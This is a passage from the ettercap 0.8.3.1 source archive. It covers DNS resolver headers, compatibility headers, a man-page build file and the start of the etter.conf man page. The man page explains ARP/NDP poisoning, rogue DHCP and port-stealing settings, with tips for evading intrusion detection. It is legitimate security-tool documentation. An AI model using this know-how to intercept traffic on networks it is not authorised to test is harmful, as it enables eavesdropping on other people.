/*%< ISDN calling address. */ ns_t_rt = 21, /*%< Router. */ ns_t_nsap = 22, /*%< NSAP address. */ ns_t_nsap_ptr = 23, /*%< Reverse NSAP lookup (deprecated). */ ns_t_sig = 24, /*%< Security signature. */ ns_t_key = 25, /*%< Security key. */ ns_t_px = 26, /*%< X.400 mail mapping. */ ns_t_gpos = 27, /*%< Geographical position (withdrawn). */ ns_t_aaaa = 28, /*%< Ip6 Address. */ ns_t_loc = 29, /*%< Location Information. */ ns_t_nxt = 30, /*%< Next domain (security). */ ns_t_eid = 31, /*%< Endpoint identifier. */ ns_t_nimloc = 32, /*%< Nimrod Locator. */ ns_t_srv = 33, /*%< Server Selection. */ ns_t_atma = 34, /*%< ATM Address */ ns_t_naptr = 35, /*%< Naming Authority PoinTeR */ ns_t_kx = 36, /*%< Key Exchange */ ns_t_cert = 37, /*%< Certification record */ ns_t_a6 = 38, /*%< IPv6 address (deprecated, use ns_t_aaaa) */ ns_t_dname = 39, /*%< Non-terminal DNAME (for IPv6) */ ns_t_sink = 40, /*%< Kitchen sink (experimentatl) */ ns_t_opt = 41, /*%< EDNS0 option (meta-RR) */ ns_t_apl = 42, /*%< Address prefix list (RFC3123) */ ns_t_tkey = 249, /*%< Transaction key */ ns_t_tsig = 250, /*%< Transaction signature. */ ns_t_ixfr = 251, /*%< Incremental zone transfer. */ ns_t_axfr = 252, /*%< Transfer zone of authority. */ ns_t_mailb = 253, /*%< Transfer mailbox records. */ ns_t_maila = 254, /*%< Transfer mail agent records. */ ns_t_any = 255, /*%< Wildcard match. */ ns_t_zxfr = 256, /*%< BIND-specific, nonstandard. */ ns_t_max = 65536 } ns_type; /* Exclusively a QTYPE? (not also an RTYPE) */ #define ns_t_qt_p(t) (ns_t_xfr_p(t) || (t) == ns_t_any || \ (t) == ns_t_mailb || (t) == ns_t_maila) /* Some kind of meta-RR? (not a QTYPE, but also not an RTYPE) */ #define ns_t_mrr_p(t) ((t) == ns_t_tsig || (t) == ns_t_opt) /* Exclusively an RTYPE? (not also a QTYPE or a meta-RR) */ #define ns_t_rr_p(t) (!ns_t_qt_p(t) && !ns_t_mrr_p(t)) #define ns_t_udp_p(t) ((t) != ns_t_axfr && (t) != ns_t_zxfr) #define ns_t_xfr_p(t) ((t) == ns_t_axfr || (t) == ns_t_ixfr || \ (t) == ns_t_zxfr) /*% * Values for class field */ typedef enum __ns_class { ns_c_invalid = 0, /*%< Cookie. */ ns_c_in = 1, /*%< Internet. */ ns_c_2 = 2, /*%< unallocated/unsupported. */ ns_c_chaos = 3, /*%< MIT Chaos-net. */ ns_c_hs = 4, /*%< MIT Hesiod. */ /* Query class values which do not appear in resource records */ ns_c_none = 254, /*%< for prereq. sections in update requests */ ns_c_any = 255, /*%< Wildcard match. */ ns_c_max = 65536 } ns_class; /* DNSSEC constants. */ typedef enum __ns_key_types { ns_kt_rsa = 1, /*%< key type RSA/MD5 */ ns_kt_dh = 2, /*%< Diffie Hellman */ ns_kt_dsa = 3, /*%< Digital Signature Standard (MANDATORY) */ ns_kt_private = 254 /*%< Private key type starts with OID */ } ns_key_types; typedef enum __ns_cert_types { cert_t_pkix = 1, /*%< PKIX (X.509v3) */ cert_t_spki = 2, /*%< SPKI */ cert_t_pgp = 3, /*%< PGP */ cert_t_url = 253, /*%< URL private type */ cert_t_oid = 254 /*%< OID private type */ } ns_cert_types; /* Flags field of the KEY RR rdata. */ #define NS_KEY_TYPEMASK 0xC000 /*%< Mask for "type" bits */ #define NS_KEY_TYPE_AUTH_CONF 0x0000 /*%< Key usable for both */ #define NS_KEY_TYPE_CONF_ONLY 0x8000 /*%< Key usable for confidentiality */ #define NS_KEY_TYPE_AUTH_ONLY 0x4000 /*%< Key usable for authentication */ #define NS_KEY_TYPE_NO_KEY 0xC000 /*%< No key usable for either; no key */ /* The type bits can also be interpreted independently, as single bits: */ #define NS_KEY_NO_AUTH 0x8000 /*%< Key unusable for authentication */ #define NS_KEY_NO_CONF 0x4000 /*%< Key unusable for confidentiality */ #define NS_KEY_RESERVED2 0x2000 /* Security is *mandatory* if bit=0 */ #define NS_KEY_EXTENDED_FLAGS 0x1000 /*%< reserved - must be zero */ #define NS_KEY_RESERVED4 0x0800 /*%< reserved - must be zero */ #define NS_KEY_RESERVED5 0x0400 /*%< reserved - must be zero */ #define NS_KEY_NAME_TYPE 0x0300 /*%< these bits determine the type */ #define NS_KEY_NAME_USER 0x0000 /*%< key is assoc. with user */ #define NS_KEY_NAME_ENTITY 0x0200 /*%< key is assoc. with entity eg host */ #define NS_KEY_NAME_ZONE 0x0100 /*%< key is zone key */ #define NS_KEY_NAME_RESERVED 0x0300 /*%< reserved meaning */ #define NS_KEY_RESERVED8 0x0080 /*%< reserved - must be zero */ #define NS_KEY_RESERVED9 0x0040 /*%< reserved - must be zero */ #define NS_KEY_RESERVED10 0x0020 /*%< reserved - must be zero */ #define NS_KEY_RESERVED11 0x0010 /*%< reserved - must be zero */ #define NS_KEY_SIGNATORYMASK 0x000F /*%< key can sign RR's of same name */ #define NS_KEY_RESERVED_BITMASK ( NS_KEY_RESERVED2 | \ NS_KEY_RESERVED4 | \ NS_KEY_RESERVED5 | \ NS_KEY_RESERVED8 | \ NS_KEY_RESERVED9 | \ NS_KEY_RESERVED10 | \ NS_KEY_RESERVED11 ) #define NS_KEY_RESERVED_BITMASK2 0xFFFF /*%< no bits defined here */ /* The Algorithm field of the KEY and SIG RR's is an integer, {1..254} */ #define NS_ALG_MD5RSA 1 /*%< MD5 with RSA */ #define NS_ALG_DH 2 /*%< Diffie Hellman KEY */ #define NS_ALG_DSA 3 /*%< DSA KEY */ #define NS_ALG_DSS NS_ALG_DSA #define NS_ALG_EXPIRE_ONLY 253 /*%< No alg, no security */ #define NS_ALG_PRIVATE_OID 254 /*%< Key begins with OID giving alg */ /* Protocol values */ /* value 0 is reserved */ #define NS_KEY_PROT_TLS 1 #define NS_KEY_PROT_EMAIL 2 #define NS_KEY_PROT_DNSSEC 3 #define NS_KEY_PROT_IPSEC 4 #define NS_KEY_PROT_ANY 255 /* Signatures */ #define NS_MD5RSA_MIN_BITS 512 /*%< Size of a mod or exp in bits */ #define NS_MD5RSA_MAX_BITS 4096 /* Total of binary mod and exp */ #define NS_MD5RSA_MAX_BYTES ((NS_MD5RSA_MAX_BITS+7/8)*2+3) /* Max length of text sig block */ #define NS_MD5RSA_MAX_BASE64 (((NS_MD5RSA_MAX_BYTES+2)/3)*4) #define NS_MD5RSA_MIN_SIZE ((NS_MD5RSA_MIN_BITS+7)/8) #define NS_MD5RSA_MAX_SIZE ((NS_MD5RSA_MAX_BITS+7)/8) #define NS_DSA_SIG_SIZE 41 #define NS_DSA_MIN_SIZE 213 #define NS_DSA_MAX_BYTES 405 /* Offsets into SIG record rdata to find various values */ #define NS_SIG_TYPE 0 /*%< Type flags */ #define NS_SIG_ALG 2 /*%< Algorithm */ #define NS_SIG_LABELS 3 /*%< How many labels in name */ #define NS_SIG_OTTL 4 /*%< Original TTL */ #define NS_SIG_EXPIR 8 /*%< Expiration time */ #define NS_SIG_SIGNED 12 /*%< Signature time */ #define NS_SIG_FOOT 16 /*%< Key footprint */ #define NS_SIG_SIGNER 18 /*%< Domain name of who signed it */ /* How RR types are represented as bit-flags in NXT records */ #define NS_NXT_BITS 8 #define NS_NXT_BIT_SET( n,p) (p[(n)/NS_NXT_BITS] |= (0x80>>((n)%NS_NXT_BITS))) #define NS_NXT_BIT_CLEAR(n,p) (p[(n)/NS_NXT_BITS] &= ~(0x80>>((n)%NS_NXT_BITS))) #define NS_NXT_BIT_ISSET(n,p) (p[(n)/NS_NXT_BITS] & (0x80>>((n)%NS_NXT_BITS))) #define NS_NXT_MAX 127 /*% * EDNS0 extended flags and option codes, host order. */ #define NS_OPT_DNSSEC_OK 0x8000U #define NS_OPT_NSID 3 /*% * Inline versions of get/put short/long. Pointer is advanced. */ #define NS_GET16(s, cp) do { \ const u_char *t_cp = (const u_char *)(cp); \ (s) = ((u_int16_t)t_cp[0] << 8) \ | ((u_int16_t)t_cp[1]) \ ; \ (cp) += NS_INT16SZ; \ } while (0) #define NS_GET32(l, cp) do { \ const u_char *t_cp = (const u_char *)(cp); \ (l) = ((u_int32_t)t_cp[0] << 24) \ | ((u_int32_t)t_cp[1] << 16) \ | ((u_int32_t)t_cp[2] << 8) \ | ((u_int32_t)t_cp[3]) \ ; \ (cp) += NS_INT32SZ; \ } while (0) #define NS_PUT16(s, cp) do { \ u_int16_t t_s = (u_int16_t)(s); \ u_char *t_cp = (u_char *)(cp); \ *t_cp++ = t_s >> 8; \ *t_cp = t_s; \ (cp) += NS_INT16SZ; \ } while (0) #define NS_PUT32(l, cp) do { \ u_int32_t t_l = (u_int32_t)(l); \ u_char *t_cp = (u_char *)(cp); \ *t_cp++ = t_l >> 24; \ *t_cp++ = t_l >> 16; \ *t_cp++ = t_l >> 8; \ *t_cp = t_l; \ (cp) += NS_INT32SZ; \ } while (0) __BEGIN_DECLS int ns_msg_getflag (ns_msg, int) __THROW; u_int ns_get16 (const u_char *) __THROW; u_long ns_get32 (const u_char *) __THROW; void ns_put16 (u_int, u_char *) __THROW; void ns_put32 (u_long, u_char *) __THROW; int ns_initparse (const u_char *, int, ns_msg *) __THROW; int ns_skiprr (const u_char *, const u_char *, ns_sect, int) __THROW; int ns_parserr (ns_msg *, ns_sect, int, ns_rr *) __THROW; int ns_sprintrr (const ns_msg *, const ns_rr *, const char *, const char *, char *, size_t) __THROW; int ns_sprintrrf (const u_char *, size_t, const char *, ns_class, ns_type, u_long, const u_char *, size_t, const char *, const char *, char *, size_t) __THROW; int ns_format_ttl (u_long, char *, size_t) __THROW; int ns_parse_ttl (const char *, u_long *) __THROW; u_int32_t ns_datetosecs (const char *, int *) __THROW; int ns_name_ntol (const u_char *, u_char *, size_t) __THROW; int ns_name_ntop (const u_char *, char *, size_t) __THROW; int ns_name_pton (const char *, u_char *, size_t) __THROW; int ns_name_unpack (const u_char *, const u_char *, const u_char *, u_char *, size_t) __THROW; int ns_name_pack (const u_char *, u_char *, int, const u_char **, const u_char **) __THROW; int ns_name_uncompress (const u_char *, const u_char *, const u_char *, char *, size_t) __THROW; int ns_name_compress (const char *, u_char *, size_t, const u_char **, const u_char **) __THROW; int ns_name_skip (const u_char **, const u_char *) __THROW; void ns_name_rollback (const u_char *, const u_char **, const u_char **) __THROW; int ns_sign (u_char *, int *, int, int, void *, const u_char *, int, u_char *, int *, time_t) __THROW; int ns_sign2 (u_char *, int *, int, int, void *, const u_char *, int, u_char *, int *, time_t, u_char **, u_char **) __THROW; int ns_sign_tcp (u_char *, int *, int, int, ns_tcp_tsig_state *, int) __THROW; int ns_sign_tcp2 (u_char *, int *, int, int, ns_tcp_tsig_state *, int, u_char **, u_char **) __THROW; int ns_sign_tcp_init (void *, const u_char *, int, ns_tcp_tsig_state *) __THROW; u_char *ns_find_tsig (u_char *, u_char *) __THROW; int ns_verify (u_char *, int *, void *, const u_char *, int, u_char *, int *, time_t *, int) __THROW; int ns_verify_tcp (u_char *, int *, ns_tcp_tsig_state *, int) __THROW; int ns_verify_tcp_init (void *, const u_char *, int, ns_tcp_tsig_state *) __THROW; int ns_samedomain (const char *, const char *) __THROW; int ns_subdomain (const char *, const char *) __THROW; int ns_makecanon (const char *, char *, size_t) __THROW; int ns_samename (const char *, const char *) __THROW; __END_DECLS #ifdef BIND_4_COMPAT #include #endif #endif /* !_ARPA_NAMESER_H_ */ /*! \file */ ettercap-0.8.3.1/include/missing/nameser_compat.h000664 000000 000000 00000014075 13711276346 021733 0ustar00rootroot000000 000000 /* Copyright (c) 1983, 1989 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /*% * from nameser.h 8.1 (Berkeley) 6/2/93 * $BINDId: nameser_compat.h,v 8.11 1999/01/02 08:00:58 vixie Exp $ */ #ifndef _ARPA_NAMESER_COMPAT_ #define _ARPA_NAMESER_COMPAT_ #define __BIND 19950621 /*%< (DEAD) interface version stamp. */ #include /*% * Structure for query header. The order of the fields is machine- and * compiler-dependent, depending on the byte/bit order and the layout * of bit fields. We use bit fields only in int variables, as this * is all ANSI requires. This requires a somewhat confusing rearrangement. */ typedef struct { unsigned id :16; /*%< query identification number */ #if BYTE_ORDER == BIG_ENDIAN /* fields in third byte */ unsigned qr: 1; /*%< response flag */ unsigned opcode: 4; /*%< purpose of message */ unsigned aa: 1; /*%< authoritive answer */ unsigned tc: 1; /*%< truncated message */ unsigned rd: 1; /*%< recursion desired */ /* fields in fourth byte */ unsigned ra: 1; /*%< recursion available */ unsigned unused :1; /*%< unused bits (MBZ as of 4.9.3a3) */ unsigned ad: 1; /*%< authentic data from named */ unsigned cd: 1; /*%< checking disabled by resolver */ unsigned rcode :4; /*%< response code */ #endif #if BYTE_ORDER == LITTLE_ENDIAN || BYTE_ORDER == PDP_ENDIAN /* fields in third byte */ unsigned rd :1; /*%< recursion desired */ unsigned tc :1; /*%< truncated message */ unsigned aa :1; /*%< authoritive answer */ unsigned opcode :4; /*%< purpose of message */ unsigned qr :1; /*%< response flag */ /* fields in fourth byte */ unsigned rcode :4; /*%< response code */ unsigned cd: 1; /*%< checking disabled by resolver */ unsigned ad: 1; /*%< authentic data from named */ unsigned unused :1; /*%< unused bits (MBZ as of 4.9.3a3) */ unsigned ra :1; /*%< recursion available */ #endif /* remaining bytes */ unsigned qdcount :16; /*%< number of question entries */ unsigned ancount :16; /*%< number of answer entries */ unsigned nscount :16; /*%< number of authority entries */ unsigned arcount :16; /*%< number of resource entries */ } HEADER; #define PACKETSZ NS_PACKETSZ #define MAXDNAME NS_MAXDNAME #define MAXCDNAME NS_MAXCDNAME #define MAXLABEL NS_MAXLABEL #define HFIXEDSZ NS_HFIXEDSZ #define QFIXEDSZ NS_QFIXEDSZ #define RRFIXEDSZ NS_RRFIXEDSZ #define INT32SZ NS_INT32SZ #define INT16SZ NS_INT16SZ #define INT8SZ NS_INT8SZ #define INADDRSZ NS_INADDRSZ #define IN6ADDRSZ NS_IN6ADDRSZ #define INDIR_MASK NS_CMPRSFLGS #define NAMESERVER_PORT NS_DEFAULTPORT #define S_ZONE ns_s_zn #define S_PREREQ ns_s_pr #define S_UPDATE ns_s_ud #define S_ADDT ns_s_ar #define QUERY ns_o_query #define IQUERY ns_o_iquery #define STATUS ns_o_status #define NS_NOTIFY_OP ns_o_notify #define NS_UPDATE_OP ns_o_update #define NOERROR ns_r_noerror #define FORMERR ns_r_formerr #define SERVFAIL ns_r_servfail #define NXDOMAIN ns_r_nxdomain #define NOTIMP ns_r_notimpl #define REFUSED ns_r_refused #define YXDOMAIN ns_r_yxdomain #define YXRRSET ns_r_yxrrset #define NXRRSET ns_r_nxrrset #define NOTAUTH ns_r_notauth #define NOTZONE ns_r_notzone /*#define BADSIG ns_r_badsig*/ /*#define BADKEY ns_r_badkey*/ /*#define BADTIME ns_r_badtime*/ #define DELETE ns_uop_delete #define ADD ns_uop_add #define T_A ns_t_a #define T_NS ns_t_ns #define T_MD ns_t_md #define T_MF ns_t_mf #define T_CNAME ns_t_cname #define T_SOA ns_t_soa #define T_MB ns_t_mb #define T_MG ns_t_mg #define T_MR ns_t_mr #define T_NULL ns_t_null #define T_WKS ns_t_wks #define T_PTR ns_t_ptr #define T_HINFO ns_t_hinfo #define T_MINFO ns_t_minfo #define T_MX ns_t_mx #define T_TXT ns_t_txt #define T_RP ns_t_rp #define T_AFSDB ns_t_afsdb #define T_X25 ns_t_x25 #define T_ISDN ns_t_isdn #define T_RT ns_t_rt #define T_NSAP ns_t_nsap #define T_NSAP_PTR ns_t_nsap_ptr #define T_SIG ns_t_sig #define T_KEY ns_t_key #define T_PX ns_t_px #define T_GPOS ns_t_gpos #define T_AAAA ns_t_aaaa #define T_LOC ns_t_loc #define T_NXT ns_t_nxt #define T_EID ns_t_eid #define T_NIMLOC ns_t_nimloc #define T_SRV ns_t_srv #define T_ATMA ns_t_atma #define T_NAPTR ns_t_naptr #define T_A6 ns_t_a6 #define T_DNAME ns_t_dname #define T_TSIG ns_t_tsig #define T_IXFR ns_t_ixfr #define T_AXFR ns_t_axfr #define T_MAILB ns_t_mailb #define T_MAILA ns_t_maila #define T_ANY ns_t_any #define C_IN ns_c_in #define C_CHAOS ns_c_chaos #define C_HS ns_c_hs /* BIND_UPDATE */ #define C_NONE ns_c_none #define C_ANY ns_c_any #define GETSHORT NS_GET16 #define GETLONG NS_GET32 #define PUTSHORT NS_PUT16 #define PUTLONG NS_PUT32 #endif /* _ARPA_NAMESER_COMPAT_ */ /*! \file */ ettercap-0.8.3.1/include/missing/ncurses_mingw.h000664 000000 000000 00000001223 13711276346 021610 0ustar00rootroot000000 000000 #ifndef _NCURSES_FOR_WINDOWS_H #define _NCURSES_FOR_WINDOWS_H /* * A little helper for ncurses code on Windows. * OS_WINDOWS doesn't really use the full ncurses yet, but a small * layer on-top of PD-curses. */ #include #undef MOUSE_MOVED /* */ #include /* PDcurses */ #include /* part of ncurses */ /* from ncurses 5.4 */ extern const char *curses_version (void); extern int vwprintw (WINDOW *, const char *,va_list); #define vw_printw vwprintw extern int wresize (WINDOW *, int, int); extern bool wenclose (const WINDOW *, int, int); #endif /* _NCURSES_FOR_WINDOWS_H */ ettercap-0.8.3.1/include/missing/scandir.h000664 000000 000000 00000000450 13711276346 020351 0ustar00rootroot000000 000000 #include extern int scandir(const char *dir, struct dirent ***namelist, int (*select)(const struct dirent *), int (*compar)(const struct dirent **, const struct dirent **)); extern int alphasort(const struct dirent **a, const struct dirent **b); /* EOF */ ettercap-0.8.3.1/include/missing/strcasestr.h000664 000000 000000 00000000234 13711276346 021123 0ustar00rootroot000000 000000 #ifndef EC_API_EXTERN #error Move this header somewhere else #endif EC_API_EXTERN char * strcasestr(const char *hailstack, const char *needle); /* EOF */ ettercap-0.8.3.1/include/missing/strlcat.h000664 000000 000000 00000000113 13711276346 020376 0ustar00rootroot000000 000000 extern size_t strlcat(char *dst, const char *src, size_t siz); /* EOF */ ettercap-0.8.3.1/include/missing/strlcpy.h000664 000000 000000 00000000113 13711276346 020422 0ustar00rootroot000000 000000 extern size_t strlcpy(char *dst, const char *src, size_t siz); /* EOF */ ettercap-0.8.3.1/include/missing/strndup.h000664 000000 000000 00000002004 13711276346 020422 0ustar00rootroot000000 000000 /* Implement the strndup function. Copyright (C) 2005 Free Software Foundation, Inc. Written by Kaveh R. Ghazi . This file is part of the libiberty library. Libiberty is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Libiberty is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with libiberty; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */ #include #include #include char * strndup (const char *s, size_t n); /* EOF */ ettercap-0.8.3.1/include/missing/strsep.h000664 000000 000000 00000000221 13711276346 020242 0ustar00rootroot000000 000000 #ifndef EC_API_EXTERN #error Move this header somewhere else #endif EC_API_EXTERN char * strsep(char **stringp, const char *delim); /* EOF */ ettercap-0.8.3.1/include/missing/termios_mingw.h000664 000000 000000 00000000561 13711276346 021614 0ustar00rootroot000000 000000 #if !defined(FAKE_TERMIOS_FOR_WINDOWS_H) && defined(_WIN32) #define FAKE_TERMIOS_FOR_WINDOWS_H #define ECHO 0x01 #define VTIME 0x00 #define ICANON 0x01 #define TCSANOW 0x02 #define NCCS 12 struct termios { unsigned c_lflag; unsigned c_cc [NCCS]; }; #define tcgetattr(x,y) ((void)0) #define tcsetattr(x,y,z) ((void)0) #endif ettercap-0.8.3.1/man/000775 000000 000000 00000000000 13711276346 014235 5ustar00rootroot000000 000000 ettercap-0.8.3.1/man/CMakeLists.txt000664 000000 000000 00000004765 13711276346 017011 0ustar00rootroot000000 000000 # Add man page custom target if(ENABLE_PDF_DOCS) find_program(GROFF_EXECUTABLE NAMES groff) set(PDF_FILES) # Check if groff supports PDF generation execute_process(COMMAND ${GROFF_EXECUTABLE} -Tpdf -V RESULT_VARIABLE GROFF_EXIT ERROR_VARIABLE GROFF_ERROR OUTPUT_QUIET) if(NOT ${GROFF_EXIT} STREQUAL 0) message(FATAL_ERROR "groff (at ${GROFF_EXECUTABLE}) does not seem to support PDF generation (${GROFF_EXIT}). groff failed with output:\n${GROFF_ERROR} Consider upgrading the groff installation. Users of Debian-based distributions must also install the full groff package.") endif() endif() set(MAN_NAMES ettercap.8 etterfilter.8 etterlog.8 etter.conf.5) set(MAN_FILES) if(ENABLE_PLUGINS) set(MAN_NAMES ${MAN_NAMES} ettercap_plugins.8) endif() if(INSTALL_DESKTOP) set(MAN_NAMES ${MAN_NAMES} ettercap-pkexec.8) endif() if(ENABLE_CURSES) set(MAN_NAMES ${MAN_NAMES} ettercap_curses.8) endif() foreach(m IN LISTS MAN_NAMES) set(mf ${CMAKE_BINARY_DIR}/man/${m}) list(APPEND MAN_FILES ${mf}) if(ENABLE_PDF_DOCS) set(pdf ${CMAKE_BINARY_DIR}/man/${m}.pdf) add_custom_command(OUTPUT ${mf}.pdf COMMAND ${GROFF_EXECUTABLE} -mandoc -Tpdf ${mf} > ${pdf} WORKING_DIRECTORY ${CMAKE_BINARY_DIR} COMMENT "Creating PDF for ${mf}" VERBATIM) list(APPEND PDF_FILES ${pdf}) install(FILES ${pdf} DESTINATION ${INSTALL_DATADIR}/ettercap/doc) endif() endforeach() add_custom_target(man ALL DEPENDS ${MAN_FILES}) if(ENABLE_PDF_DOCS) add_custom_target(pdf ALL DEPENDS ${PDF_FILES}) endif() install(FILES ${CMAKE_BINARY_DIR}/man/ettercap.8 ${CMAKE_BINARY_DIR}/man/etterfilter.8 ${CMAKE_BINARY_DIR}/man/etterlog.8 DESTINATION ${MAN_INSTALLDIR}/man8/) configure_file("ettercap.8.in" "ettercap.8") configure_file("etterfilter.8.in" "etterfilter.8") configure_file("etterlog.8.in" "etterlog.8") configure_file("etter.conf.5.in" "etter.conf.5") if(ENABLE_PLUGINS) install(FILES ${CMAKE_BINARY_DIR}/man/ettercap_plugins.8 DESTINATION ${MAN_INSTALLDIR}/man8/) configure_file("ettercap_plugins.8.in" "ettercap_plugins.8") endif() if(ENABLE_CURSES) install(FILES ${CMAKE_BINARY_DIR}/man/ettercap_curses.8 DESTINATION ${MAN_INSTALLDIR}/man8/) configure_file("ettercap_curses.8.in" "ettercap_curses.8") endif() if(INSTALL_DESKTOP) install(FILES ${CMAKE_BINARY_DIR}/man/ettercap-pkexec.8 DESTINATION ${MAN_INSTALLDIR}/man8/) configure_file("ettercap-pkexec.8.in" "ettercap-pkexec.8") endif() install(FILES ${CMAKE_BINARY_DIR}/man/etter.conf.5 DESTINATION ${MAN_INSTALLDIR}/man5/) ettercap-0.8.3.1/man/etter.conf.5.in000664 000000 000000 00000040654 13711276346 017010 0ustar00rootroot000000 000000 .\" ettercap -- a multipurpose sniffer/interceptor utility .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTER.CONF 5 "" "ettercap @VERSION@" .SH NAME etter.conf - Ettercap configuration file .SH DESCRIPTION .B "etter.conf" is the configuration file that determines ettercap behaviour. It is always loaded at startup and it configures some attributes used at runtime. .LP The file contains entries of the form: .RS .nf .ft B .sp [section] .ft B entry = value .I "..." .ft R .fi .RE .LP Each entry defines a variable that can be customized. Every value MUST be an integer. Sections are used only to group together some variables. .Sp .B NOTE: if you omit a variable in the conf file, it will be initialized with the value 0. It is strongly discouraged to not initialize critical variables such as "arp_poison_delay" or "connection_timeout". .LP The following is a list of available variables: .TP 20 .B [privs] .TP .B ec_uid This variable specifies the UID to which privileges are dropped at startup. After the socket at link layer has been opened the privileges are dropped to a specific uid different from root for security reasons. etter.conf is the only file that is read with root privs. Be sure that the specified uid has enough privs to read other files (etter.*) You can bypass this variable by setting the environment variable EC_UID. .TP 20 .B [mitm] .TP .B arp_storm_delay The value represents the milliseconds to wait between two consecutive packets during the initial ARP scan. You can increment this value to be less aggressive at startup. The randomized scan plus a high delay can fool some types of ARP scan detectors. .TP .B arp_poison_smart With this variable set, only 3 initial poisoned ARP messages are sent to the victims. This poisoned status is kept up by ettercap with responding to ARP requests from victims that want to refresh their ARP cache. This makes the ARP poisoning very stealthy but may be unreliable on shared media such as WiFi. .TP .B arp_poison_warm_up When the poisoning process starts, the inter-packet delay is low for the first 5 poisons (to be sure the poisoning process has been successful). After the first 5 poisons, the delay is incremented (to keep up the poisoning). This variable controls the delay for the first 5 poisons. The value is in seconds. .br The same delay is used when the victims are restored to the original associations (RE-ARPing) when ettercap is closed. .TP .B arp_poison_delay This variable controls the poisoning delay after the first 5 poisons. The value is expressed in seconds. You can increase this value (to try to fool the IDS) up to the timeout of the ARP cache (which depends on the poisoned operating system). .TP .B arp_poison_icmp Enable the sending of a spoofed ICMP message to force the targets to make an arp request. This will create an arp entry in the host cache, so ettercap will be able to win the race condition and poison the target. Useful against targets that do not accept gratuitous arp if the entry is not in the cache. .TP .B arp_poison_reply Use ARP replies to poison the targets. This is the classic attack. .TP .B arp_poison_request Use ARP request to poison the targets. Useful against targets that cache even arp request values. .TP .B arp_poison_equal_mac Set this option to 0 if you want to skip the poisoning of two hosts with the same mac address. This may happen if a NIC has one or more aliases on the same network. .TP .B dhcp_lease_time This is the lease time (in seconds) for a dhcp assignment. You can lower this value to permit the victims to receive a correct dhcp reply after you have stopped your attack. Using higher timeouts can seriously mess up your network after the attack has finished. On the other hand some clients will prefer a higher lease time, so you have to increase it to win the race condition against the real server. .TP .B port_steal_delay This is the delay time (in milliseconds) between stealing packets for the "port" mitm method. With low delays you will be able to intercept more packets, but you will generate more traffic. You have to tune this value in order to find a good balance between the number of intercepted packets, re-transmitted packets and lost packets. This value depends on full/half duplex channels, network drivers and adapters, network general configuration and hardware. .TP .B port_steal_send_delay This is the delay time (in microseconds) between packets when the "port" mitm method has to re-send packets queues. As said for port_steal_delay you have to tune this option to the lowest acceptable value. .TP .B ndp_poison_warm_up This option operates similar to the arp_poison_warm_up option. When the poisoning process starts, this option controls the NDP poison delay for the first 5 poisons (to be sure the poisoning process has been successful). After the first 5 poisons, the delay is incremented (to keep up the poisoning). This variable controls the delay for the first 5 poisons. The value should be lower than the \fBndp_poison_delay\fR. The value is in seconds. .br The same delay is used when the victims are restored to the original associations when ettercap is closed. .br .TP .B ndp_poison_delay This option is similar to the arp_poison_delay option. It controls the delay in seconds for sending out the poisoned NDP packets to poison victim's neighbor cache. This value may be increased to hide from IDSs. But increasing the value increases as well the probability for failing race conditions during neighbor discovery and to miss some packets. .br .TP .B ndp_poison_send_delay This option controls the delay in microseconds between poisoned NDP packets are sent. This value may be increased to hide from IDSs. But increasing the value increases as well the probability for failing race conditions during neighbor discovery and to miss some packets. .br .TP .B ndp_poison_icmp Enable the sending of a spoofed ICMPv6 message to motivate the targets to perform neighbor discovery. This will create an entry in the host neighbor cache, so ettercap will be able to win the race condition and poison the target. Useful against targets that do not accept neighbor advertisements if the entry is not in the cache. .br .TP .B ndp_poison_equal_mac Set this option to 0 if you want to skip the NDP poisoning of two hosts with the same mac address. This may happen if a NIC has one or more aliases on the same network. .br .TP .B icmp6_probe_delay This option defines the time in seconds ettercap waits for active IPv6 nodes to respond to the ICMP probes. Decreasing this value could lead to miss replies from active IPv6 nodes, hence miss them in the host list. Increasing the value usually has no impact; normally nodes can manage to answer during the default delay. .br .B NOTE: The ndp and icmp6 options are only available if ettercap has been built with IPv6 support .TP 20 .B [connections] .TP .B connection_timeout Every time a new connection is discovered, ettercap allocates the needed structures. After a customizable timeout, you can free these structures to keep the memory usage low. This variable represents this timeout. The value is expressed in seconds. This timeout is applied even to the session tracking system (the protocol state machine for 